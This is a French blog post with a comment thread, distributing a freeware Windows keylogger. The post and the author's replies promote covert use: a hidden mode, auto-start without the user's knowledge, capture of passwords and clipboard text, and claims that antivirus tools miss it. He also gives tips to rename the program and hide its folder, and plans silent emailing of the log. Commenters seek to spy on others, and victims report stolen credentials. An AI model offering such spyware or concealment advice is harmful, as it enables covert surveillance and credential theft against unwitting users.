[logiciel] Keylogger - capture des touches du clavier
[mise à jour 10-12-2008] [mise à jour 20-12-2007*] Volvox Keylogger : Enregistreur de frappes. Le moyen le plus simple pour enregistrer ce qui est saisi au clavier. Il n’y a quasiment rien à configurer. Marque la date et l’heure de la frappe, et identifie sa provenance - noms de l’application et de la fenêtre qui a le focus , que se soit un fureteur, un logiciel d’édition de texte, une application de messagerie (courriel, msn…). Récupère aussi les copier/coller, ainsi que les mots de passe derrière les astérisques. Si on utilise ce programme à l’insu de l’utilisateur, on cachera l’application (mode Cacher) et préférablement on le lancera automatiquement dès le démarrage de Windows (mode Autodémarrer caché).

Les touches sont capturées dans un fichier log facilement accessible.
Exemple:

[Téléchargement] Comme à l’habitude, un fichier compressé au format .rar qu’il faut extraire dans un dossier au choix. Comprend une DLL à conserver dans le même dossier que l’application. Aucune installation requise. Pour l’enlever de l’ordinateur on n’a qu’à supprimer le dossier et son contenu. Prendre **ici** . Fichier aide compris. Utilisation extrêmement facile, passera inaperçu. Volvox Keylogger n’est pas un trojan, n’utilise aucun rootkit, exempt de toute mauvaise intention. À ma connaissance, mon ‘keylogger’ n’est pas détecté par les antivirus. Des problèmes? Lire les commentaires s.v.p.
[Complément] Pourquoi utiliser Volvox Keylogger ? En cas d’abus, pour savoir ce qui est fait sur votre ordinateur lorsque vous n’êtes pas devant. Pour garder un oeil sur les activités à risque de vos enfants. Pour récupérer des mots de passe. À utiliser avec discernement et dans le respect des personnes. Merci. - Comme de coutume, les sources sont disponibles. Prochaine mise à jour ou version: retransmission du log à distance via email.
Si vous désirez aussi connaître les pages web visitées et les images vues (sans frappe), voir cet autre logiciel espion Renifleur - Surveillance du web.
Définition de keylogger chez Wikipedia.
[Technique] Il y a généralement deux approches de conception d’un keylogger pour Windows: celle plus complexe mais plus efficace ou un ‘hook’ est installé sur l’ordinateur à surveiller. Ce ‘hook’ prend la forme d’une DLL externe au programme principal exploitant la fonction API SetWindowsHookEx au niveau du système. Cette fonction capture tous les ‘messages’ envoyés par le clavier ou même la souris. Ensuite on filtre ces messages pour ne retenir que les éléments essentiels parmi les 256 possibilités de clés virtuelles, soit principalement l’alphabet, en minuscules ou majuscules (utile pour capturer les mots de passe) et les chiffres. C’est la technique utilisée par Volvox Keylogger. Une autre méthode, plus simple, fait appel à un timer (minuterie) commandant les fonctions API GetAsyncKeyState et GetKeyState à l’intérieur même du programme, donc sans DLL externe.
Ensuite, un keylogger doit être caché de la vue des utilisateurs. Pour Windows XP, il est facile de cacher une application pour qu’elle n’apparaisse pas à l’écran ou sur la barre des tâches, mais ça l’est beaucoup moins pour la soustraire de la liste des processus visibles dans le gestionnaire des tâches. Windows XP ne permet pas de soustraire une application du gestionnaire des tâches, il montre intégralement tous les processus lancés. Les fonctions pour les cacher ne sont plus disponibles (ça l’était pour W98 ou versions antérieures). Les trojans le font en utilisant la technique des rootkit, par camouflage en adoptant un nom proche d’un processus normal déjà existant (par exemple svcshost.exe - proche de l’habituel svchost.exe), ou plus rarement en s’installant comme service - ce qui est déjà moins visible qu’un processus régulier. Volvox Keylogger n’utilise pas de rootkit et ne se soustrait pas du gestionnaire des tâches, mais une astuce est donnée pour le camoufler au besoin (voir fichier aide inclus).
===================
[Mises à jour] [mise à jour 10-01-2008] Correction de deux bogues. Le premier affectant les touches Flèche Haut et Flèche Bas qui étaient bloquées, et le deuxième sur le plantage de l’Explorer en certaines circonstances. [mise à jour 20-12-2007] Si la touche TAB vous causais des ennuis (voir parmi les commentaires de Yvan au 19-12-2007). Prendre la dernière version téléchargeable ci-haut (section Téléchargement) - Build: 10 janvier 2008.
Commentaires ou questions? Note: Lire les commentaires - vous trouverez peut-être une réponse à votre question ou problème.
Exemple:
Mercredi, décembre 12, 2007 à 7:25
Bonjour
Pour une novice (ou je dirais plutot pas douée du tout avec mon PC ) comme moi est il facile d’installer KEYLOGGER et de récupérer les informations captées sur un pc avec vista. existe t il un autre logiciel de capture adapté à Vista ??
Merci de votre aide
Chantal
Mercredi, décembre 12, 2007 à 2:21
bonjour,
En mode auto demmarage, le logiciel est bien lancé mais aucun enregistrement dans le fichier log. J’ai l’impression qu’il faut appuyer sur le bouton lancer en manuel…
Comment faire pour lancer la capture d’une manière entièrement automatique au demarrage??
Merci
Mercredi, décembre 12, 2007 à 2:30
Bonjour Chantal.
Je n’ai pas testé Volvox Keylogger avec VISTA. Mais je présume qu’il est compatible parce que la même fonction d’interception des touches du clavier utilisé avec XP est aussi présente sur Vista. Je vous suggère donc d’essayer le logiciel. Au pire il ne se passera rien. Sinon je pourrais l’adapter.
Mercredi, décembre 12, 2007 à 5:46
RE: Tonio — je test l’application et reviens avec une solution ou correction du logiciel.
Revenu: J’ai vérifié et les touches sont surveillées au démarrage de windows après avoir coché l’option “Autodémarrer Caché”
Après le démarrage de Windows vérifie l’application en tapant Ctrl+Alt+N - tu devrais alors voir ceci: http://i8.tinypic.com/6o173wo.jpg
Note: le bouton est en mode “Arreter” - ce qui signifie que V.Keylogger est démarré et qu’il surveille les touches. Tu peux en faire le test à ce moment en tapant quelques touches et voir le log.
Préviens moi si ce n’est pas le cas.
Vendredi, décembre 14, 2007 à 12:09
Effectivememnt le programme est bien lancé au demmarage de windows et tout parait normal. Par contre le fchier HookLog.txt n’est pas créé suite a une frappe au clavier alors que cela fonctionne lorsqu’on lance le soft manuellemnt!
Salutations
Vendredi, décembre 14, 2007 à 12:18
ok j’ai compris! en mode auto le fichier log n’est pas cree dans le repertoire d’instal!
desolé du dérangement
@+
Vendredi, décembre 14, 2007 à 2:30
Exact - j’aurais du le mentionner. Au démarrage automatique le fichier log est créé dans un répertoire différent - pour ne pas attirer l’attention. .
Mercredi, décembre 19, 2007 à 9:28
Bonjour, J’ai lancé le soft en caché, cela fonctionne relativement bien, c’est à dire que lors de temps en temps il m’affiche le message d’erreur suivant : ” Cannot focus a disabled or invisible windows ” il semble que cela corresponde à l’appuis de la touche tabluation, donc pour la discrétion c’est pas TOP, avez-vous une idée ?
Merci
Yvan
Mercredi, décembre 19, 2007 à 12:07
Pour info le message d’erreur cité plus haut intervient en mode caché et en utilisant la touche tabulation
Mercredi, décembre 19, 2007 à 12:56
RE: Yvan :
En effet cela correspond à la touche TAB - c’est la propriété navigation accordée à la touche tab par windows. Je pense avoir contourné la propriété et l’erreur. Allez prendre la nouvelle version plus haut dans le téléchargement habituel. Si c’est corrigé vous me le dites et je vais le rendre officiel. Merci.
Note: comme mentionné dans une note, il est préférable de changer le nom de l’application - de cette façon, si une erreur se produit, le nom original de l’application (…keylogger) ne sera pas affiché à l’écran.
Le soft fonctionne plutôt bien ‘à mon avis’ ;) Il capture même les textes copiés/collés avec la souris, ce qui n’est le cas d’aucun autre keylogger gratuit. Et dernière note: le keylogger doit être mis en mode ‘caché’ pour tout prendre, touches du clavier et texte manipulé par la souris.
Mercredi, décembre 19, 2007 à 5:40
eh bien monseur, bravo pour la dernière version, effectivement en mode caché la touche tabulation n’a plus d’effet donc discretion assurée, il meste à relancer mon pc en mode caché et automatique je vous tient au courant si problème, sans nouvelle de ma part c’est que c’est bon ! quoique tout compte fait un petit coup de pub c’est pas interdit ?! A ++
Dimanche, décembre 23, 2007 à 9:27
en ce qui me concerne j’utilise powered keyloger patchè et il marche plutot bien , sauf qu’il n’affiche pas les entreés du pavé numeriques , ce qui est trés facheu, alors une solution ?
Dimanche, décembre 23, 2007 à 9:33
j’ai telecharger celui de volvox , mais il manque le dll !!
Dimanche, décembre 23, 2007 à 10:35
RE: twa -
Je n’ai pas de solution concernant Power Key Logger ‘patché’ - sauf leur demander (bonne chance).
Celui de Volvox .. c’est celui que j’ai programmé. Volvox Keylogger capte le pavé numérique, mots de passe, textes copiés/collés etc.
Note: J’ai remis la DLL (oubliée dans la dernière mise à jour).
Signé: Volvox.
Samedi, décembre 29, 2007 à 4:52
salut je voulais savoir s il est possible de récuperer les donner mm si l ordinateur c est fermer.
Dimanche, décembre 30, 2007 à 11:00
Oui, les données sont enregistrées dans un fichier. On n’a qu’à lancer l’application et consulter le log.
Lundi, décembre 31, 2007 à 9:15
Les flèches haut et bas sont désactivées lorsque le logiciel tourne.
Lundi, décembre 31, 2007 à 1:59
Je vais corriger…. et le mentionner dans le texte.
Merci.
Dimanche, février 3, 2008 à 8:12
voilà petit problème j’ai lancer le programme et mis cacher j’ai taper ctrl+alt+n et rien j’aimerais récupérer ça comment faire car j’avais des soupçons sur celui qui venait sur mon pc
Dimanche, février 3, 2008 à 11:47
Bonjour Aneken … Assurez-vous que le logiciel est bien lancé en l’identifiant parmi les processus sur le Gestionnaire des Tâches (nom du processus: VOLVOXKEYLOG.EXE). S’il est bien en opération et caché il devrait répondre à Ctrl+Alt+N.
Jeudi, février 21, 2008 à 11:43
Bonjour,
Lorsque j’appuie sur Ctrl Alt N, la première fois, l’interface apparait,,mais si je la cache de nouveau et essai de la rappeler par la même combinaison de touche, rien ne se passe.
Si je vérifie dans le gestionnaire de tâche, l’application est pourtant en cours.
Jeudi, février 21, 2008 à 12:02
Hummm …. SOLUTION : Après avoir fait réapparaitre l’application il faut la l’arrêter (appuyer sur le bouton [Arrêter]) avant de la cacher de nouveau. Je vais tenter de corriger ce inconvénient à la prochaine mise à jour. Dans la prochaine version il y aura un envoi ’silencieux’ du log par messagerie SMTP.
Merci de l’avoir signalé.
Dimanche, février 24, 2008 à 2:46
problèmes d’accent circonflexe sur les voyelles quand le programme est lancé
EX: la t^^ete le ch^^apeau ect….
sur le net ce probléme est la faute d’un keylogger. Pour la confidentialité magnifique…
je plaisante à bient^^ot
scarabé
Dimanche, février 24, 2008 à 3:13
Je croyais avoir contourné ce problème - mais non! - il y est est bien! Les accents circonflex sur les claviers multilingues sont formés en appuyant sur deux touches, la première étant morte mais envoyant un message à la yoyelle qui suit. On aura alors ê, â, î etc. Je dois donc trouver une solution pour que le keylogger n’intercepte pas la touche morte. S’il y a d’autres malfonctions merci de me les signaler.
Jeudi, mars 6, 2008 à 5:54
bonjour, j’aimerai savoir sil est possible de le lancer en insérant une clé usb et qu’il enregistre le log dans cette même clé
merci
Jeudi, mars 6, 2008 à 9:13
Oui c’est possible, et le log sera mis dans la clé. Ne pas oublier d’y copier aussi la dll.
Jeudi, mars 6, 2008 à 10:08
Bonjour Volvox,
J’ai un Pb sur Vista avec la version du 10/01/08
le programme ce lance bien au démarage du pc mail il ne log rien !
je suis obliger de tuer le process et de le relancer sur ma session pour qu’il log qq chose bizare :/ et quelque fois explorer plante.
Merci pour ton boulot c’est sympas de ta part ;)
@++
Jeudi, mars 6, 2008 à 9:51
Je suis encore à travailler pour mettre ce logiciel compatible avec Vista. Il y a assurément des problèmes de droits (propriété des sessions), ce qui explique que le log ne s’écrit pas au premier abord. Vista est assurément plus ‘protégé’ ou partitionné que l’est XP. Pour le plantage Explorer, tu peux me dire en quelles cieconstances elles se produisent, à la fermeture du keylogger ou pendant qu’il est en exécution? Merci.
Vendredi, mars 7, 2008 à 2:53
pendant qu’il est en exécution il faut clicker sur caché et coché “ne plus affiché” dans la boite de dialogue et ensuite je click sur ok, et quand j’ouvre explorateur de fichier il plante sinon si j’attends entre 5 a 10 mn j’ouvre explorateur de fichier il ne plante pas bizare !
Merci @+
Mardi, mars 11, 2008 à 3:39
Salut
Après qqs essais, pas trouvé de bugs notoires :)
Dans mon cas, xp familial, 4 cessions dont 1 administrateur:
- 1) Ne pas omettre de dézipper le fichier dans un fichier comme commun windows, pour ma part , ou programfiles (?)
- 2) les logs générés sont créés respectivement dans C:\Documents and settings \ puis les comptes de chacun des utilisateurs du PC. Dommage…
Bon travail Volvox ! et bonne continuation
Mercredi, mars 12, 2008 à 10:07
Évidemment, il est préférable que le logiciel soit décompressé sous une session Administrative puis placé dans un dossier qui passera inaperçu (évitez Documents and Settings, Mes Documents etc.). On pourra aussi changer le nom du logiciel. Le log se trouvera toujours dans le même dossier que le logiciel, pas ailleurs.
Lundi, mars 17, 2008 à 7:49
salut,
je voulais savoir si ce programme est compatible avec ubuntu (linux). J’ai essayé mais pour l’instant je n’ai pas de programme pour le décompresser, de ce fait je n’arrive pas à l’ouvrir, mais avant de faire sa je voulais savoir s’il était compatible !
merci
Lundi, mars 17, 2008 à 4:30
Malheureusement non, il ne l’est pas.
Mardi, mars 18, 2008 à 10:49
salut a tous . je voudrais savoir ou retrouver le fichier avec ce qui a ete tapé,enfin le nom du fichier ou se trouve l objet qui m interesse.merci d avance et excusez moi pour ma nullitée profonde…………!!!!!!!!!
Mardi, mars 18, 2008 à 12:45
Le fichier log (ou tout ce qui est tapé est enregistré) se trouve dans le même répertoire que le logiciel. Par exemple, si le logiciel a été placé dans le répertoire ou dossier C:\MesProgrammes\Kellog\ … alors le fichier texte y sera. Ce fichier porte le nom de HookLog.txt .
Jeudi, mars 20, 2008 à 11:23
salut c est encore moi le nul .donc j ai trouvé hook_ddl.ddl mais tout est inscrit en ebreu(mdr) j ai pas appris ca a l ecole.donc j explique:volvox est sur/c:programmes files/volvox.quand j ouvre le dossier volvox j ai winrar qui s ouvre et m affiche volvox .a lire.hook_ddl et quand j ouvre hook BINGO tout est en chti ou en gavanais ou encore en ebreu.aidez moi.indiquez moi le chemin a suivre pour retrouver ces fichus inscriptions et surtout pouvoir les decriptées.MERCI D AVANCE D AIDER UN PAUVRE MEC COMPLETEMENT DESESSPERE. (lol)
Je te réponds ICI:
1. Il faut extraire dans un dossier les fichiers contenus dans l’archive compressées RAR.
(au besoin, utilisez Unrar pour faire l’extraction - voir le menu en haut de cette page)
2. On lance l’application (exécutable) en suivant les instructions.
3. le fichier ou s’inscrit le texte se trouvera dans le même dossier que l’application. Se fichier se nomme HookLog.txt
C’est un fichier que l’on peut ouvrir avec Notepad ou tout autre éditeur de texte.
Jeudi, mars 20, 2008 à 2:31
jerome - voir réponse plus haut.
Vendredi, mars 21, 2008 à 9:13
Bonjour, comment je peux télécharger volvox Keylogger capture clavier puisque il n’y a pas de fonction téléchargement
merci pour la réponse
Vendredi, mars 21, 2008 à 9:57
Bonjour: En haut, dans la section Téléchagement, on clique sur le lien **ici**. On recevra l’archive rar qu’il faut décompresser. Si vous n’avez pas d’outil pour décompresser ce type d’archives voir tout en haut sur le menu à l’indication UNRAR.
Samedi, mars 22, 2008 à 11:56
Bonjour, encore moi voilà une fois intallée sur XP le logiciel me répond le fichier log n’existe pas faire en mode manuel merci
Samedi, mars 22, 2008 à 12:20
C’est mal installé ou utilisé. Il faut bien mettre le logiciel et sa dll dans un dossier du disque dur (pas sur le bureau). On le lance et le dédémarre. Le fichier contenant les écritures se trouveras dans ce même dossier. On le lit après avoir fermé l’application.
Dimanche, mars 23, 2008 à 10:12
Bonjour et merci cette fois je l’ai bien installé seulement je n’arrive pas a retrouver la fenêtre pour ouvrir et éffacer le log par contre je peux lire les informations a partir du disqur dur . comment je fais pour éffacer le log sans la fenêtre merci
Jeudi, mars 27, 2008 à 2:32
problème : n’enregistre pas les touches sur google (zone de recherche)
Jeudi, mars 27, 2008 à 11:38
Il peut arriver que la capture ne se fassent pas dans certaines circonstances pour certains ordinateurs et certains claviers. Mais dans le cas de la zone de recherche ça le fait pour mon ordinateur et clavier. J’ai tester pour IExplorer et Firefox dans la zone de recherche Google et Babylone, et pour deux ordinateurs différents.
Résultat de la capture:
————————————-
Process : firefox.exe
Fenêtre : Page d’accueil de Mozilla Firefox - Mozilla Firefox
Date Heure : 28/03/08 00:28:55
————————————-
test de keylogger volvox
————————————-
Process : iexplore.exe
Fenêtre : Babylon Search - Microsoft Internet Explorer
Date Heure : 28/03/08 00:33:40
————————————-
test de volvox keylogger Iexplorer
Mercredi, avril 2, 2008 à 5:05
Outil simple et agréable à utiliser ,
En mode auto le fichier log est créé dans “%Homedrive%%homepage%” ce qui n’est pas très discret,
Serait il possible dans une prochaine version de le mettre dans le répertoire d’install, quite à préfixer le fichier avec l’username courant ?
A moins qu’il existe un clé à mettre dans le config.ini ?
Merci encore et bonne continuation
Mercredi, avril 2, 2008 à 3:44
Non, pas de clé - mais je croyais que le fichier se créait bien dans le répertorie d’installation. Je vais revoir le code et corriger s’il y a lieu. Merci.
Jeudi, avril 3, 2008 à 7:24
Nous attendons une mise à jour des bugs, pour ma part l’accent circonflexe?
Jeudi, avril 3, 2008 à 12:13
Oui ça c’est un problème qui affecte les claviers multilingues utilisés pour le français. Il me faut remapper la touche du carret (^). J’y arrive presque. A bientôt.
Mercredi, avril 9, 2008 à 3:57
Bonjour,
j’ai installé volfox dans C:\Program Files\VOLVOXKEYLOG3 mais il n’enregistre que 2 sessions sur les 3 de mon ordinateur.
Les 2 seules ou j’ai lancé volfox sur les sessions mêmes.
La session sur laquelle je n’ai pas lancé le logiciel n’est pas enregistrée.
Est il possible de le lancer par défaut sur toutes les sessions
Mercredi, avril 9, 2008 à 3:09
Pour le moment non, le programme ne sait pas reconnaitre les différentes sessions ou usagers, il faut y aller session par session. Mais je vais voir s’il n’y a pas une façon de l’installer en service avant le logon. Ça devient un peu difficile car les bons antivirus surveillent et détectent ces hooks de clavier, surtout si mis en service.
Dimanche, avril 20, 2008 à 5:14
bonjour,
Quelqu’un a utilisé volvox keyloger contre moi. Il m’a soutiré mes identifiants et mot de passe d’un MMORPG. J’aimerais savoir comment faire pour le supprimer de mon ordinateur définitivement plutot que de l’arreter a chaque fois que j’allume mon PC.
Mardi, avril 22, 2008 à 10:25
je cherche a savoir si il est possible t’avoir les informations tapé sur le clavier d’un autre ordinateur que le sien, peut-on envoyé d’une maniére quelqu’on un lien pour pouvoir le faire ?
Mardi, avril 22, 2008 à 11:21
C’est ce qu’il m’est arrivé j’ai téléchargé une image d’un “ami” et dans un pixel il avait caché le keylogger ainsi qu’un “truc” pour envoyer le log. Ceci etant il pouvais voir tout ce que je tapais depuis mon ordinateur.
Mercredi, avril 23, 2008 à 11:27
A kcinnay: kcinnay, c’est impossible de faire comme tu dis avec volvox keylogger. Il doit s’agir d’une autre application.
A XoX-XoX : évidemment que sur un réseau local tu pourrais le faire (il suffit alors d’aller de placer le keylogger dans un dossier partagé). Autrement ça me parait difficile à faire avec la version actuelle du keylogger car on franchi alors le seuil du piratage. J’aurai peut-être sous peu une version différente et qui sait?
Mercredi, avril 23, 2008 à 11:46
Pourtant sur mon ordinateur volvoxKeyLogger est installé alors que je ne l’ai jamais téléchargé. Et comme par hasard depuis se fameux jour ou je suis allé voir cette image. En tout cas peu importe comment il est arrivé sur mon ordi j’aimerais juste savoir comment l’enlever.
Mercredi, avril 23, 2008 à 1:24
A kcinnay : si tu crois que le keylogger a été installé a ton insu alors enlève tout simplement le fichier et la dll. On peut changer le nom de l’application mais pas celui de la dll obligatoire pour faire fonctionner le logiciel, alors cherche pour ce fichier nommé HooK_DLL.dll dans ton ordinateur et détruit-le.
Mercredi, avril 23, 2008 à 3:27
conné tu un logiciel qui permet cette possibilité , si oui qu’elle est son nom. Merci
Mercredi, avril 23, 2008 à 7:36
Merci beaucoup. Ca m’enleve une épine du pied.
A XoX-XoX: Chercherai tu par hasard à pirater quelqu’un? Pour en avoir été victime je peux te dire que c’est très désagréable, si c’est ça que tu veux, réfléchis y à deux fois avant de le faire car tu sera dans l’illégalité et tu risque une amende et de la prison.
Encore merci je ne vous embête plus.
Jeudi, avril 24, 2008 à 9:28
A XoX-XoX: tu trouveras ce que tu cherches sur internet mais fait gaffe car en les téléchargeant tu vas infecter ton ordinateur, garanti! Faut être programmeur pour manipuler ce genre d’applications et posséder les sources de l’application car à tout coup il faut changer le nom des variables pour ne pas que les antivirus le détecte au premier coup d’oeil. Bref ce n’est pas si simple.
Vendredi, mai 9, 2008 à 5:00
bonjour,
voilà j’ai installé le volvox mais en appuyant sur ctrl+alt+n, il n’apparait pas et quand je vais dans le fichier pour l’activer “autodémarrage caché” un message d’erreur s’affiche “failed to set data for”NMB”. j’aimerai savoir comment on fait une fois qu’il est installé pour le faire fonctionner. Voilà ce que j’ai fait exactement:
telecharger le fichier zip, tout extraire, ouvrir le volvox, coher autodem et lancer, fermer le tout et rien ça ne marche pas
merci pour ta reponse
Vendredi, mai 9, 2008 à 7:04
cet exelent keyloger ne marche pas sous vista, mais parfaitement sous XP. Une mise à jour prevue pour vista ? Message d’erreur losque l’on clique sur autodem: failed to set data for “NMB”, et de plus il dit que le log des frappes n’existe pas……
Mardi, mai 13, 2008 à 3:06
A lili : Cette erreur est produite par une mauvaise installation de l’application. Le fichier DLL inclus dans l’archive .rar doit se situer dans le même dossier que l’exécutable. C’est tout simple, il doit y avoir 2 fichiers dans le dossier : l’exécutable et la DLL.
A net user: “cet exelent keyloger ne marche pas sous vista, mais parfaitement sous XP.” L’erreur vient de l’autodémarrage qui est différent sous VISTA (plus sécurisé) - je vais modifier la source sous peu.
Jeudi, mai 15, 2008 à 5:14
Bonjour
Je viens d’apprendre qu’on me ’surveille’ avec hooklog et je voudrais savoir comment faire pour le supprimer définitivement de l’ordi…
merci d’avance
Jeudi, mai 15, 2008 à 5:34
J’ai la version Vista, tu ne penses pas que ça vient de là? J’ai vu que sur d’autres sites on pouvait telecharger le volvox gratuitement et je l’ai fait (c ce que j’ai fait en premier qd je t ecris). Si je telecharge celui de ce site je n’ai pas la meme chose, dois je telecharger les 2 ou le tien suffit? je suis une nul en info si tu pouvais m’expliquer comment faire exactement ça serait gentil
Merci de ton aide
Jeudi, mai 15, 2008 à 5:41
non en fait c bon je crois que j’ai compris comment le supprimer…mais est-il possible de le laisser sur l’ordinateur mais de le désactiver au lieu de le supprimer?
Vendredi, mai 16, 2008 à 2:21
[quote="lili"]# à dit: Jeudi, mai 15, 2008 à 5:34 J’ai la version Vista, tu ne penses pas que ça vient de là? J’ai vu que sur d’autres sites on pouvait telecharger le volvox gratuitement et je l’ai fait (c ce que j’ai fait en premier qd je t ecris). Si je telecharge celui de ce site je n’ai pas la meme chose, dois je telecharger les 2 ou le tien suffit? je suis une nul en info si tu pouvais m’expliquer comment faire exactement ça serait gentil
Merci de ton aide
[/quote]
Possible que le problème vienne de VISTA, lorsque tu demandes le démarrage automatique de l’application. Comme je l’ai écris plus haut c’est une chose que je vais corriger. Mais autrement je ne comprends pas ta question. Possible d’avoir plus de détails?
Samedi, mai 17, 2008 à 5:27
eu salut comment je fait pour avoir une keylogger ?
Samedi, mai 17, 2008 à 5:41
a c bon g la keylogger
Samedi, mai 17, 2008 à 5:41
mais après comment je fait pour voir les touches d mec ?
Jeudi, mai 22, 2008 à 9:55
Bonjour,
Je suis en train de tester pour voir si qqun utilise mon PC en mon absence. Je vois un souci dans le concept. Il me semble que d’avoir tous ses passwords stockés dans un fichier texte en clair n’est pas top du tout. Ca oblige a arréter le LOGGING pour la saisie de ces infos…Je propose les pistes suivantes pour remédier à cela dans la prochaine version:
1) renommer l’extension du log en .ocx ou .hdr ou ??? même si le contenu est identique . Ca ne ralentira pas le logging mais attirera moins l’attention
il suffit de copier ou renommer le fichier de log pour l’ouverture dans notepad
2) faire un mode expert ou le log est zippé et protégé par password.
3) encrypter le fichier log et le décripter avant de le présenter à la consultation
Sinon bon boulot !!
Vendredi, mai 23, 2008 à 12:32
Trois propositions faciles à réaliser - pourra être fait à la prochaine version. Bientôt.
Merci pour le commentaire.
Jeudi, mai 29, 2008 à 12:40
jijiodf hduht ds
Vendredi, mai 30, 2008 à 6:13
Bonjour, quand la version de Volvox Keylogger sera-t-elle compatible totalement avec Vista ?Merci à vous et bravo pour votre logiciel.Simple mais efficace!!!
Samedi, mai 31, 2008 à 5:29
Bonjour, j’ai installé ce programme sous Me, il a l’air de bien fonctionner, par contre, sur mon ordinateur principal qui est sous Vista le log ne se fait pas. Quand j’essaie de mettre le l’auto démarrage automatique, j’obtiens une erreur :
“Failed to set data for NMB”, que cela signifie t’il et comment faire pour que cela fonctionne sous Vista ?
Merci d’avance pour votre réponse.
Mario
Dimanche, juin 1, 2008 à 11:39
Eden - Mario ….. concernant VISTA j’y verrai. Maisauparavant avez-vous essayez de le faire fonctionner sous compatibilité XP (option accessible sous Vista dans les propriétés de l’exécutable ?)
Dimanche, juin 1, 2008 à 8:05
Pour être honnéte non.
Je vais certainement poser une question bête mais les propriétés de l’éxécutable, ça se trouve comment et où ???
pas taper, pas taper… je suis nul en informatique, mais je ne demande qu’à apprendre.
Lundi, juin 2, 2008 à 1:13
A: Mario… Pour exécuter en mode de compatibilité XP (clic droit sur le fichier exécutable - Onglet « compatibilité » ; Cocher « exécuter ce programme en mode de compatibilité pour : XP
Exemple:
http://img139.imageshack.us/img139/3006/capturevj4.jpg
Lundi, juin 2, 2008 à 2:03
Je suis désolé, mais cela n’a pas l’air de fonctionner, quand je clique sur voir le log, il me dit que le fichier n’existe pas et me demande si je désire le créer.
De plus l’auto démarrage ne fonctionne pas, pourtant je dispose de tous les droits sur l’ordinateur puisque je suis un des seuls utilisateur.
Pourtant, j’ai fait exactement ce qui est sur la capture, avec le tiquage de la case en plus.
Lundi, juin 2, 2008 à 10:11
OK - Ce sera corrigé dans la prochaine version.
Lundi, juin 2, 2008 à 9:50
En fait, je crois que j’ai tou essayé et le programme refuse de fonctionner sous Vista.
Je ne sis pas si cela vient de mon ordinateur ou du programme.
Je crois que je vais attendre un version pour Vista, on verra après.
Avez-vous une idée de quand elle sera disponible ?
Sinon, je trouve ce programme très sympa sous Me, il m’a déjà permis de récupérer des textes pour mes cours, j’ai un portable qui a une batterie qui ne tient plus du tout, à peine il bouge, si le cable d’alimentation se décroche, c’est la catastrophe, alors rien que pour cela, je tiens à vous remercier pour ce programme.
Une dernière petite question et apres j’arrete, ce programme est il repérable par spybot ou un antivirus tel que Avast ou Norton?
Mardi, juin 3, 2008 à 1:15
A Mario … Avez-vous essayez sous Vista sans le cacher. J’ai réussi ici de cette façon. Vista impose bcp de changement au programme - Vista (pour le moment encore) est plus difficile à hacker que XP moins bien protégé. Mais il y a tjrs moyen. Le programme n’est actuellement pas repérable par spybot ou un antivirus.
J’aurai bientôt une autre version.
Mercredi, juin 4, 2008 à 1:46
Bonjour, j’ai utilisé voter keylogger volvox pendant un certain temps et tout fonctionnait bien mais après une semaine, je ne pouvais plus faire mes accents, l’ordi ne les reproduisait pas sur l’écran. Dès que j’ai enlever votre keylogger, j’ai résolu mon problème d’accents, tout est redevenu normal. Alors je ne peux plus l’utiliser, c’est vraiment dommage car c’est un bon programme.
Merci de votre réponse
Mercredi, juin 4, 2008 à 11:28
- - je sais … cela se produit sur certains types de claviers multilingues (canada). J’ai à revoir le code .. c’est sur la courte liste. A plus.
Dimanche, juin 15, 2008 à 10:19
Bonjour
Enregistre t il le mot de passe administrateur ? ou de session ?
Merci
Vendredi, juin 20, 2008 à 2:12
Bonjour,
Dans votre réponse à Mario du 3 juin, vous dites d’essayer sous Vista sans le cacher.
Il sera donc visible, donc pas discret du tout !! Ou bien, il y a une autre astuce ?
Merci de votre réponse.
Mercredi, juin 25, 2008 à 4:56
Bonjour,
Je suis sous vista et comme j ai pu le lire deja sur le site, je n arrive pas au bout d un moment a faire apparaitre la fenetre donc n arrive pas non plus a lire le fichier txt.
Dans ce cas la est t il possible de consulter le fichier temp ?
Si oui, ou se trouve t il ?
Merci
Vendredi, juin 27, 2008 à 12:22
Je viens de telecharger volvox mais rien ne s’affiche dansle log. Y at’il besoin d’installer quelque chose en plus? Rien ne s’affiche que dois je faire?
Dimanche, juin 29, 2008 à 12:52
j lai téléchrgé jé lancé mé quand je clique sur voir le log un message m’affiche :”il n’existe pa de log” alors commant le visualiser. merci
Jeudi, juillet 3, 2008 à 1:38
A propos > retransmission par mail
attention, certains fournisseurs comme gmail.com pourraient être incompatibles, le smtp utilise, par exemple, le port 465 en écurisé… :)
Vendredi, juillet 4, 2008 à 3:21
Bonjour,
je viens de telecharger keylogger apres extration et installation des fichiers dans le meme dossier je ne peux pas lancer l’applic j’ai le message m’indiquant que la dll est introuvable que dois je faire et sous quel version de windows cette application tourne t’elle ?
merci
Vendredi, juillet 4, 2008 à 4:52
à DR
1° as-tu bien tout extrait avant de le lancer ?
2° si oui, retélécharge le et réessaie, je viens de le faire et ça tourne nickel sous XP familial
poste à nouveau en cas de soucis, j’essaierai de t’aider :)